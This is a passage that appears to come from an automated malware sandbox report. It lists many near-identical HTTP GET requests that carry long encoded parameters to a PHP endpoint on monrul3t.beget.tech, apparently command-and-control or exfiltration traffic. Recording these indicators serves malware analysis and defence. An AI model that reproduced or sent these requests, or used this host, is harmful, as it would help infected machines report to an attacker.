ROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kD